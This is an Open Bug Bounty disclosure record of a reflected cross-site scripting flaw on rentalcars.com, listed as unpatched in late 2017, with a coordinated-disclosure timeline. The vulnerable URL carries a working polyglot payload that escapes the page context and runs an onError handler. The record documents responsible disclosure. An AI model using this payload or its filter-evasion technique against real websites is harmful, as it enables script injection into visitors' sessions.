rentalcars.com XSS vulnerability

2017-09-22T19:26:00
ID OBB:307432
Type openbugbounty
Reporter qiece
Modified 2017-12-24T11:18:00

Description

Vulnerable URL:
http://www.rentalcars.com/SearchResults.do?enabler=&country;=%D0%91%D0%B5%D0%BB%D0%B0%D1%80%D1%83%D1%81%D1%8C&doYear;=2017&city;=%D0%91%D1%80%D0%B5%D1%81%D1%82&driverage;=on&doFiltering;=true&dropCity;=%D0%91%D1%80%D0%B5%D1%81%D1%82&driversAge;=30&filterTo;=49&fromLocChoose;=true&dropLocationName;=111%3C!%27/*%22/*\%27/*\%22/*--%3E%3C/Script%3E%3CImage%20SrcSet=K%20*/;%20OnError=confirm`OPENBUGBOUNTY`%20//%3E#
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 24.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2551
VIP website status:| Yes
Check rentalcars.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 September, 2017 19:26 GMT
Vulnerability existence verified and confirmed| 25 September, 2017 10:43 GMT
Generic security notifications sent to website owner| 25 September, 2017 10:43 GMT
Notification sent to subscribers (without technical details)| 25 September, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 24 December, 2017 11:18 GMT